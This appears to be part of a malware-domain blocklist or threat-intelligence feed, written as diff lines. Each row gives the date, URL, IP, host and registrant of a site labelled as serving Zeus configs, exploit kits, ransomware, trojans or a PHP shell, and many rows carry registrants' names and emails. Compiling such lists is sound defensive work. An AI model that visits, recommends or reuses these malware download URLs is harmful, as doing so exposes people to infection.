+"2012/04/16_14:40","police11.provenprotection.net/?1284cf325cf33aa48aeb29aee89b3473","91.195.254.86","-","Ransom message text","Michelle Arney / -","43997","0","RU", +"2012/04/16_14:40","-","91.195.254.86/?1284cf325cf33aa48aeb29aee89b3473","-","Ransom message text","-","43997","0","RU", +"2012/04/16_14:40","-","91.195.254.74/?b933de68eae80dadb34b9d4b889575eb","-","Ransom message text","-","43997","0","RU", +"2012/04/20_15:11","-","91.196.216.64/s.php?ref=referrer&cls=colorDepth&sw=width&sh=height&dc=charset&lc=location&ua=userAgent","-","Exploit","-","43239","0","RU", +"2012/04/30_16:15","-","91.223.223.244/c.bin","91.223.223.244.hostpro.com.ua.","zeus config file","-","21219","0","UA", +"2012/04/30_16:15","-","91.223.223.244/b.php","91.223.223.244.hostpro.com.ua.","zeus drop zone","-","21219","0","UA", +"2012/04/30_16:15","-","188.40.168.128/c.bin","static.128.168.40.188.clients.your-server.de.","zeus config file","-","24940","0","DE", +"2012/04/30_16:15","-","188.40.168.128/b.php","static.128.168.40.188.clients.your-server.de.","zeus drop zone","-","24940","0","DE", +"2012/05/02_13:48","-","194.183.224.73/out/out.htm","www.van-helden.net.","Java exploits serves Poison Ivy","-","5463","0","BE", +"2012/05/05_12:32","-","46.166.146.110/","-","AnonJDB Control Panel","-","57668","0","GB", +"2012/05/06_18:07","www8.0zz0.com/2012/05/05/18/394995639.gif","70.38.12.107","-","trojan Ransom","Arabic-web / -","32613","0","CA", +"2012/05/06_18:07","www12.0zz0.com/2012/05/06/00/464591666.gif","67.205.89.53","-","trojan","Arabic-web / -","32613","0","CA", +"2012/05/07_13:49","-","91.202.244.89/files/957f2","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/05/07_13:49","-","91.202.244.89/files/a69fa","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/05/07_13:49","-","91.202.244.89/files/bdd35","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/05/07_21:32","-","91.202.244.89/files/957f2","-","Ransom.WindowsSecurity","-","44784","0","UA", +"2012/05/07_21:32","-","91.202.244.89/files/a69fa","-","Ransom.WindowsSecurity","-","44784","0","UA", +"2012/05/07_21:32","-","91.202.244.89/files/bdd35","-","Ransom.WindowsSecurity","-","44784","0","UA", +"2012/05/10_12:55","-","91.202.244.89/files/920b8","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/05/10_12:55","-","91.202.244.89/files/443aa","-","Ransom WindowsSecurity","-","44784","0","UA", +"2014/03/23_10:15","metrocuadro.com.ve/coolest/2013googledocs/","66.111.47.8","cinaruco.tepuyserver.net.","Backdoor.IRCBot","-","21840","0","US", +"2014/03/23_10:15","www.petpleasers.ca/templates/rhuk_milkyway/images/red/sll.exe","66.49.201.136","-","Trojan.Dropper","-","33139","0","CA", +"2012/05/31_21:49","-","184.154.76.237/search.php?q=fa16f5d3def51288","184.154.76.237.virtualsrv.com.","Exploit","-","32475","0","US", +"2012/05/31_21:49","dimenal.com.br/cUEDN4w2/index.html?s=883&lid=2267&elq=11f7b1b5179f45b09737bdf10d0fe61f","187.19.96.13","server03.certto.com.br.","Leads to exploit kits","antonio sestito sobrinho / dimenal@hotmail.com","28130","0","BR", +"2012/05/31_21:49","dimenal.com.br/HHv0oxBP/index.html?s=883&lid=2298&elq=11f7b1b5179f45b09737bdf10d0fe61f","187.19.96.13","server03.certto.com.br.","Leads to exploit kits","antonio sestito sobrinho / dimenal@hotmail.com","28130","0","BR", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=8","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=9","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=6","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=7","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=5","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=3","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=4","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2012/05/31_21:49","miespaciopilates.com/7Fy2FzNg/index.html","69.61.18.58","linux51.webhosting-network-services.com.","Leads to exploit kits","Pablo Pianetti / -","22653","0","US", +"2012/05/31_21:49","puenteaereo.info/fHA5c5iw/index.html?s=883&lid=2231&elq=11f7b1b5179f45b09737bdf10d0fe61f","50.22.86.10","50.22.86.10-static.reverse.softlayer.com.","Leads to exploit kits","Laura Margolis / laura@areasur.com.uy","36351","0","US", +"2012/05/31_21:49","puenteaereo.info/fHA5c5iw/index.html?s=883&lid=2270&elq=11f7b1b5179f45b09737bdf10d0fe61f","50.22.86.10","50.22.86.10-static.reverse.softlayer.com.","Leads to exploit kits","Laura Margolis / laura@areasur.com.uy","36351","0","US", +"2012/05/31_21:49","puenteaereo.info/KE3pt5Ye/index.html?s=883&lid=2328&elq=11f7b1b5179f45b09737bdf10d0fe61f","50.22.86.10","50.22.86.10-static.reverse.softlayer.com.","Leads to exploit kits","Laura Margolis / laura@areasur.com.uy","36351","0","US", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=12","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=11","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2012/06/01_21:45","-","95.163.104.80/spielberg/start.php","-","Ransom message text","-","12695","0","RU", +"2014/03/21_13:13","zjjlf.croukwexdbyerr.net/zyso.cgi?16","66.96.195.49","66-96-195-49.static.hostnoc.net.","redirects to exploit kit","Registrar Abuse Contact abuse@web.com","21788","0","US", +"2012/06/19_07:03","www.panazan.ro/online/libraries/pattemplate/patTemplate/Modifier/HTML/im/o/z/3pingo/cfg.bin","89.42.216.47","server20.whmpanels.com.","zeus config file","-","5606","0","RO", +"2012/06/19_07:03","www.panazan.ro/online/libraries/pattemplate/patTemplate/Modifier/HTML/im/o/z/3pingo/gate.php","89.42.216.47","server20.whmpanels.com.","zeus drop zone","-","5606","0","RO", +"2014/03/21_09:24","www.two-of-us.at/images/W.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/06/21_19:08","-","216.18.228.149/~anon/jdb/inf.php?id=455cec1f823b2f0a13dd26655ac6bcfa","-","Java drive-by","-","33569","0","US", +"2012/06/26_05:59","ns1.updatesdns.org/static.htmls","46.17.102.124","node-46.17.102.124.reverse.x4b.org.","zeus config file","cao yang / zxhxnjsgh@126.com","49335","0","RU", +"2014/03/21_09:24","www.two-of-us.at/images/vein.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/06/28_21:29","-","91.223.82.58/~rivernig/19/config.bin","-","Zeus config file","-","51430","0","NL", +"2012/06/28_21:29","-","91.223.82.58/~rivernig/19/gate.php","-","Zeus drop zone","-","51430","0","NL", +"2012/06/29_21:50","-","188.190.98.132/ph/dmg5.php?i=8","ip-188-190-98-132.hosted-in.infiumhost.com.","trojan Gataka","-","197145","0","UA", +"2014/03/21_09:24","www.two-of-us.at/images/s4x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/s2x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/07/03_13:17","wetjane.x10.mx/","69.175.121.66","boru.x10hosting.com.","Java exploit","x10 Hosting / % by email at ayuda@nic.mx .","32475","0","US", +"2012/07/03_13:43","-","69.162.82.26/version2/webber/1/config.bin","26-82-162-69.static.reverse.lstn.net.","Zeus config file","-","46475","0","US", +"2012/07/03_13:43","-","69.162.82.26/version2/webber/1/gate.php","26-82-162-69.static.reverse.lstn.net.","Zeus drop zone","-","46475","0","US", +"2012/07/05_12:06","-","91.202.244.122/files/2f646","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/07/05_12:06","-","91.202.244.122/files/2c753","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/07/05_12:06","-","91.202.244.122/files/36cf4","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/07/14_19:38","-","109.163.225.232/download.php?id=25","lh17626.limehost.ro.","Trojan","-","39743","0","RO", +"2012/07/15_00:08","-","203.63.5.190/2m0AZfuu/WM4.exe","24x7Shop.cyberefficiency.com.au.","Trojan","-","2764","0","AU", +"2014/03/21_09:24","www.two-of-us.at/images/s2.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/m.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/digitalcoinminer.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/dgc4x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/dc.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/07/20_23:08","elew72isst.rr.nu/mm.php?d=x1","194.28.115.150","h150-115.net.lan-rybnitsa.com.","Leads to Fake AV","InfoRelay abuse@sitelutions.com","48691","0","MD", +"2014/03/21_09:24","www.two-of-us.at/images/bz.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/BR.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/aurcoinlab.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/08/30_06:59","www.perupuntocom.com/claroideas.exe","68.178.254.187","p3slh042.shr.phx3.secureserver.net.","trojan","Registercom / domainregistrar@register.com","26496","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/au4x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/10/24_20:51","xamateurpornlic.www1.biz/latest/xxx-porn-movie.avi.exe","94.199.53.203","ded-srv-pool-53-203.23net.hu.","trojan ZeroAccess/Sirefef","ChangeIP Network Operations / noc@changeip.com","30836","0","HU", +"2012/10/26_23:28","-","69.55.49.159/Ice/index.php","-","exploit kit","-","46652","0","US", +"2012/10/26_23:28","-","69.55.49.159/config.bin","-","Zeus config file","-","46652","0","US", +"2012/10/26_23:28","-","69.55.49.159/gate.php","-","Zeus drop zone","-","46652","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/1.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/pictures.php","85.158.181.11","server143-han.de-nserver.de.","PHP.Shell","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/11/13_10:00","-","61.19.251.27/web/cb.php","-","CrimeBoss exploit kit","-","9931","0","TH", +"2014/03/13_18:46","milleniumpapelaria.com.br/tag/class/editor.php?edit=gz","192.185.213.84","-","exploit kit","MARLON DURAES BIAZIN / m_biazin@hotmail.com","20013","0","US", +"2012/11/18_15:21","xpornstarsckc.ddns.name/latest/xxx-porn-movie.avi.exe","94.199.53.203","ded-srv-pool-53-203.23net.hu.","trojan","-","30836","0","HU", +"2012/11/19_07:51","natural.buckeyeenergyforum.com/r/l/the-joint.php","193.0.179.20","frolov4me.biz.","Cool exploit kit","Domains By Proxy, LLC / -","57062","0","RU", +"2012/11/19_07:51","narrow.azenergyforum.com/r/l/brown_season.php","193.0.179.20","frolov4me.biz.","Cool exploit kit","Domains By Proxy, LLC / -","57062","0","RU", +"2012/11/19_18:52","-","209.236.67.163/8bd7d5194/wergwrg3gwer","209.236.67.163.static.westdc.net.","trojan","-","29854","0","US", +"2012/11/19_18:52","upswings.net/track.php?c005","174.120.146.138","shared0003.apthost.com.","redirects to exploit kit","hello@flirt-with.me.uk","21844","0","US", +"2012/11/19_18:52","www.lyzgs.com/track.php?c005","203.158.16.75","-","redirects to exploit kit","qinxianyuechaojinshuzhipinyouxiangongsi / cangzhouyouhua@163.com","17964","0","CN", +"2012/11/19_18:52","weboxmedia.by/track.php?c005","77.222.40.74","-","redirects to exploit kit","-","44112","0","RU", +"2012/11/22_12:32","ukrfarms.com.ua/images/tovar.jpg.php","213.227.207.89","h1-kv.alkar.net.","iframe leads to CritXPack exploit kit","registry@vegatele.com","6703","0","UA", +"2012/11/22_12:32","babos.scrapping.cc/v211112n/i.php?token=forum","62.76.47.12","62-76-47-12.clodo.ru.","CritXPack exploit kit","-","48172","0","RU", +"2012/11/23_07:35","mlpoint.pt/Scripts/d.html","81.88.48.97","-","obfuscated iframe leads to Nuclear exploit kit","ML POINT - COMUNICAÇÃO E IMAGEM, UNIPESSOAL LDA / mariotm@sapo.pt","39729","0","IT", +"2012/11/25_18:48","gravityexp.com/go.php?sid=12","46.163.117.144","lvps46-163-117-144.dedicated.hosteurope.de.","redirects to exploit kit","cristina giordani / francesca.muglia.130@istruzione.it","20773","0","DE", +"2012/11/26_08:23","-","85.143.166.181/t221112d/i.php?token=default","85-143-166-181.clodo.ru.","CritXPack exploit kit","-","56534","0","RU", +"2012/11/27_10:18","winlock.usa.cc/k8uiaii89819aj/get.php?f=7","109.163.231.219","lh20422.voxility.net.","backdoor","-","39743","0","RO", +"2012/12/02_21:28","-","212.84.187.68/job.php?php=receipt","68-187.skymarket.net.uk.","trojan inside zip file","-","20860","0","GB", +"2014/03/13_12:51","dev.wrathofshadows.net/255163377.htm","98.131.229.2","rev.opentransfer.com.2.229.131.98.in-addr.arpa.","exploit kit","Registrar Abuse Contact domainabuse@tucows.com","32392","0","US", +"2012/12/10_09:06","analxxxclipsyjh.dnset.com/latest/amateur_dog_sex_01.avi.exe","94.199.53.203","ded-srv-pool-53-203.23net.hu.","trojan","Network Operations, ChangeIP / noc@changeip.com","30836","0","HU", +"2012/12/10_15:48","private.hotelcesenaticobooking.info/r/l/updating-bugs_keeping.php","93.190.43.44","-","Cool exploit kit","Ivano Di Biasi / ryhab@ryhab.com","6849","0","UA", +"2012/12/21_02:03","port.bg/wfgv.html?php=receipt","91.196.124.59","host124-59.superhosting.bg.","Redirects to exploit","-","8262","0","BG", +"2012/12/26_19:46","webordermanager.com","98.124.199.1","redirector-sjl.enom.com.","Redirects to exploit","AMA Holding / aanelli@yahoo.com","21740","0","US", +"2012/12/26_19:46","videoflyover.com","98.124.198.1","redirector-ash.enom.com.","redirects to exploit","AMA Holding / aanelli@yahoo.com","21740","0","US", +"2013/01/04_18:06","-","82.113.204.228:8080/get/lite.dll.crp","-","malware calls home","-","30848","0","IT", +"2014/03/11_22:39","www.0uk.net/zaaqw/Pony.exe","178.211.53.17","server-178.211.53.17.as42926.net.","Trojan.Pony","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","42926","0","TR", +"2013/01/05_20:04","cwmgaming.com","198.27.64.67","ns4004653.ip-198-27-64.net.","iFrames to Exploit","979 Ventures / -","16276","0","CA", +"2014/03/11_22:39","www.0uk.net/zaaqw/cs.exe","178.211.53.17","server-178.211.53.17.as42926.net.","Trojan.Pony","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","42926","0","TR", +"2014/03/11_22:39","ukonline.hc0.me/new.exe","5.135.127.68","-","Win32/Injector.Autoit.ABQ trojan","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/01/11_07:08","50efa6486f1ef.skydivesolutions.be/news/refusal/natural.cgi","93.189.40.173","-","Cool exploit kit","Not shown, please visit www.dns.be for webbased whois. / support@key-systems.net","41853","0","RU", +"2014/03/11_22:39","ukonline.hc0.me/Host.exe","5.135.127.68","-","Win32/Spy.Agent.NYU trojan","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/01/18_08:22","-","66.230.143.147/it/","-","Dialler.GlobalAccess","-","23393","0","US", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/CPUMiner.files","5.135.127.68","-","Trojan.PlasmaRAT.Miner","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/01/26_00:14","-","78.110.62.95/airyoleg.php?boutfage=889821","95-62-110-78.net.hts.ru.","Impact exploit kit","-","31240","0","RU", +"2013/01/26_00:14","-","78.110.62.95/jentrate.php","95-62-110-78.net.hts.ru.","Part of Impact exploit kit","-","31240","0","RU", +"2013/01/26_00:14","-","78.110.62.95/jeanfage/aimoping.jar","95-62-110-78.net.hts.ru.","Part of Impact exploit kit","-","31240","0","RU", +"2013/01/26_00:14","-","78.110.62.95/jeanfage/jokevity.jar","95-62-110-78.net.hts.ru.","Part of Impact exploit kit","-","31240","0","RU", +"2013/01/26_00:14","-","78.110.62.95/jeanfage/test.jar","95-62-110-78.net.hts.ru.","Part of Impact exploit kit","-","31240","0","RU", +"2014/03/11_22:39","directxex.com/uploads/965775728.crypt.exe","108.162.199.96","-","Win32/Spy.Zbot.AAQ trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/813441197.ms.exe?dl=1813441197.ms.exe","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/565785830.been.exe","108.162.199.96","-","MSIL/Injector.CSR trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/482862824.kmahard.exe","108.162.198.96","-","MSIL/Injector.CUX trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/472678730.2113899106.puttymanager.exe","108.162.198.96","-","Win32/TrojanDropper.VB.OJG trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/39164388.ms.exe?dl=1","108.162.198.96","-","Win32/Injector.AYKD trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/341043287.crypted.exe","108.162.198.96","-","Win32/Injector.AYNZ trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/2056064399.ms.exe","108.162.198.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1870347935.http.exe","108.162.198.96","-","MSIL/Injector.CSR trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1835173533.ms.exe?dl=11835173533.ms.exe","108.162.198.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2013/02/11_08:24","www.offerent.com/tmp/5lro65.php?receipt_print=825_417011330","200.58.119.30","texila.dattaweb.com.","trojan inside zip file","www.offerent.com / walterpbook@gmail.com","27823","0","AR", +"2014/03/11_22:39","directxex.com/uploads/1803412028.mintt.exe","108.162.199.96","-","Win32/Injector.AYNZ trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1491944748.whaat.exe","108.162.199.96","-","Gen:Variant.Strictor.51736","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1599687595.ms.exe?dl=11599687595.ms.exe","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2013/03/13_14:46","mycleanpc.tk/download/","31.170.163.144","-","leads to malicious download on Mediafire","abuse@dot.tk","47583","0","US", +"2013/03/20_09:36","bbs.bjchun.com/report.htm","115.47.69.193","-","redirects to exploit kit","chunsheying@163.com","17964","0","CN", +"2013/03/20_12:34","customsboysint.com/1/25/human-head-wireframe","72.167.131.8","p3slh153.shr.phx3.secureserver.net.","redirecting to Sweet Orange exploit kit with Google referrer","hendrick faria / -","26496","0","US", +"2014/03/11_22:39","directxex.com/uploads/1271351103.ms.exe?dl=1","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1271351103.ms.exe","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2013/04/07_09:31","www.daspar.net/components/.kkcpgr.php?action=ss00_323","176.9.90.164","stegro-cos-mpr-200.unaxus.net.","Trojan.Krypt","artesima@gmx.ch","24940","0","DE", +"2013/04/16_00:32","freefblikes.phpnet.us","209.190.85.252","www.quark.byethost4.com.","VBScript.Trojan.IRC","Administrator Administrator / hostorgadmin@googlemail.com","10297","0","US", +"2013/04/17_08:58","-","61.63.123.44/news.html","61-63-123-44.nty.dynamic.tbcnet.net.tw.","iframe leads to Java exploit","-","4780","0","TW", +"2014/03/11_22:39","directxex.com/uploads/1005443056.cryptedserver.exe","108.162.198.96","-","Win32/TrojanDropper.VB.OJG trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2013/05/06_09:50","-","198.50.194.26/statistic/increases/street_throwing_keeps.php","-","exploit kit","-","16276","0","CA", +"2013/05/10_17:35","-","5.135.115.193:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","serv2-am.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.194:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.195:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta1.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.196:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta2.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.197:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta3.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.198:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta4.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.199:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta5.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.100:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","-","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.201:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta7.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.202:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta8.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.203:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta9.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.204:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta10.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.205:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta11.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.206:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta12.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.207:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta13.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.208:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta14.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.209:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta15.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.210:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta16.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.211:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta17.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.212:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta18.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.213:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta19.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.214:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta20.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.215:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta21.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.216:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta22.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.217:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta23.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.218:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta24.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.219:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta25.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.220:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta26.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.221:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta27.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.222:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta28.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","78.110.162.72:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-72.rdns.ldni.net.","trojan","-","42831","0","GB", +"2013/05/10_17:35","-","78.110.162.73:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-73.rdns.ldni.net.","trojan","-","42831","0","GB", +"2013/05/10_17:35","-","78.110.162.79:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-79.rdns.ldni.net.","trojan","-","42831","0","GB", +"2013/05/10_17:35","-","94.23.38.214:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","ns368891.ovh.net.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","217.8.253.250:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mail.trcontents.co.uk.","trojan","-","20738","0","GB", +"2013/05/10_17:35","-","103.4.218.22:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","-","trojan","-","131472","0","TH", +"2013/05/10_17:35","-","85.214.133.237:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","gamelevel.de.","trojan","-","6724","0","DE", +"2013/05/10_17:35","-","94.23.38.214:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","ns368891.ovh.net.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","180.235.132.29:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","-","trojan","-","55639","0","HK", +"2013/05/10_17:35","-","208.88.5.229:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","d05805e4.powerprojct.ca.","trojan","-","36218","0","CA", +"2013/05/10_17:35","-","66.175.218.117:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","li513-117.members.linode.com.","trojan","-","6939","0","US", +"2013/05/12_14:55","-","103.4.218.22:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","-","Trojan.FakeAlert","-","131472","0","TH", +"2013/05/12_14:55","-","180.235.132.29:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","-","Trojan.FakeAlert","-","55639","0","HK", +"2013/05/12_14:55","-","208.88.5.229:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","d05805e4.powerprojct.ca.","Trojan.FakeAlert","-","36218","0","CA", +"2013/05/12_14:55","-","217.8.253.250:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mail.trcontents.co.uk.","Trojan.FakeAlert","-","20738","0","GB", +"2013/05/12_14:55","-","5.135.115.100:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","-","Trojan.FakeAlert","-","16276","0","FR", 